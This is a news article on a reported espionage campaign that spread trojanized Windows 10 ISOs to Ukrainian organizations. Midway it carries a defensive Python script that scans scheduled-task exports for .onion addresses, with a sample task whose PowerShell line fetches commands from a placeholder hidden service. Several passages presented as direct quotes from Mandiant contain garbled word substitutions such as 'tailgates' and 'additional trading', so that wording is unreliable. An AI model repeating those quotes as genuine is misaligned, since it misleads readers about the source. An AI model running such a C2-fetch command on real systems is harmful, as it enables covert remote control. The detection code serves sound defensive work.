Ukrainian Organizations Hit With New Supply Chain Attack

Software supply chain attacks are not slowing down, and researchers have uncovered a new example that targeted victims in Ukraine with malicious Windows setup files that were designed to harvest and exfiltrate sensitive data from compromised machines.

The campaign involved threat actors hosting the malicious files on torrent sites hosted in Russia and Ukraine. The files were disguised as legitimate Windows 10 installers, and Mandiant researchers, who discovered the operation, attributed it to a previously unknown group tracked as UNC4166. Although the actors have not been identified, Mandiant said some of the victim organizations overlapped with ones that APT28 has previously targeted with destructive malware attacks. APT28, also known as Fancy Bear, is associated with Russia's GRU military intelligence unit.

The operation appears to have focused solely on information gathering, with no financial motivation, Mandiant said. In some of the compromised organizations, UNC4166 actors installed backdoors to maintain persistence.

“The Trojan ISOs were hosted on Ukrainian and Russian language torrent sharing sites. Upon installation of the compromised software, the malware collects information about the compromised system and extracts it. On a subset of victims, additional tools are deployed to enable further intelligence gathering. In some cases, we discovered additional payloads that were likely deployed after initial reconnaissance, including STOWAWAY, BEACON, and SPAREPART tailgates,” a Mandiant post on the operation reads.

Software supply chain attacks have become a tool of choice for some top-tier threat groups, especially those in the intelligence community. Compromising a piece of software or library and having the results trickle down through the supply chain can pay dividends for months or years. Mandiant said that this specific operation began several months ago and that one of the ISO files used in it was designed to disable security telemetry and also block automatic updates.

“The ISO contained malicious scripting tasks that were altered and identified across multiple systems in three different Ukrainian organizations that targeted .onion TOR domains starting in mid-July 2022,” Mandiant said.

“Mandiant assesses that the threat actor performs an initial triage of the compromised devices, likely to determine if the victims were of interest. This triage is carried out using the trojanized programming tasks. In some cases, the threat actor may implement additional data theft capability or new persistence backdoors, likely for redundancy in the SPAREPART cases or to enable additional trading with BEACON and STOWAWAY.”

Investigators said the operation was likely designed to collect information from Ukrainian government agencies.

“Mandiant identified several devices within Ukrainian government networks containing malicious scheduling tasks that were communicating with a TOR website starting around July 12, 2022. These scheduling tasks act as a lightweight backdoor that retrieves tasks via HTTP requests to a given command and control (C2) server,” Mandiant said.
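A defender-side hunt for the scheduled-task behaviour described above, as an added example that is not from the article or from Mandiant: it parses Task Scheduler XML exports (the format produced by `schtasks /query /xml`) and flags Exec actions whose command line references a .onion host. The task names, paths and hidden-service hostname in the samples are constructed placeholders, not indicators from the campaign.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML exports (schtasks /query /xml /tn <name>).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Tor hidden-service hostnames: 16-char (v2) or 56-char (v3) base32 labels.
ONION_RE = re.compile(r"\b[a-z2-7]{16}(?:[a-z2-7]{40})?\.onion\b", re.IGNORECASE)


def find_onion_actions(task_xml: str) -> list:
    """Return the Exec actions of one exported task that reference a .onion host."""
    root = ET.fromstring(task_xml)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="<unnamed>", namespaces=NS)
    hits = []
    for action in root.findall(".//t:Actions/t:Exec", NS):
        cmd = action.findtext("t:Command", default="", namespaces=NS)
        args = action.findtext("t:Arguments", default="", namespaces=NS)
        match = ONION_RE.search(f"{cmd} {args}")
        if match:
            hits.append({"task": uri, "command": cmd, "arguments": args,
                         "onion_host": match.group(0).lower()})
    return hits


def scan_exports(task_xml_docs: list) -> list:
    """Run the check over a batch of exported task documents (one <Task> each)."""
    return [hit for doc in task_xml_docs for hit in find_onion_actions(doc)]


# Constructed sample exports (not captured from the campaign): one benign task,
# one whose action fetches from a placeholder hidden service.
BENIGN_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Maintenance\\CleanupLogs</URI></RegistrationInfo>
  <Actions><Exec><Command>C:\\Windows\\System32\\forfiles.exe</Command>
    <Arguments>/p C:\\Logs /d -30 /c "cmd /c del @file"</Arguments></Exec></Actions>
</Task>"""

SUSPECT_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Telemetry\\UpdateCheck</URI></RegistrationInfo>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-NoProfile -Command "Invoke-WebRequest http://abcdefghijklmnop.onion/tasks"</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for hit in scan_exports([BENIGN_TASK, SUSPECT_TASK]):
        print(f"{hit['task']}: {hit['command']} {hit['arguments']} -> {hit['onion_host']}")
```

On a live host, feed the function the output of `schtasks /query /xml /tn <task>` for each task; a hit is a starting point for triage, not proof of compromise, since the match is on the command line alone.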

“We believe that the operation was intended for Ukrainian entities, due to the language pack used and the website used to distribute it. The use of ISO with Trojans is novel in espionage operations and the included anti-detection capabilities indicate that the actors behind this activity are security conscious and patient, as the operation would have required significant time and resources to develop and to wait for the ISO to be installed in a network of interest.”

In some cases, the compromised devices had more than one backdoor, and the attackers also attempted to download and install Tor Browser on some machines.
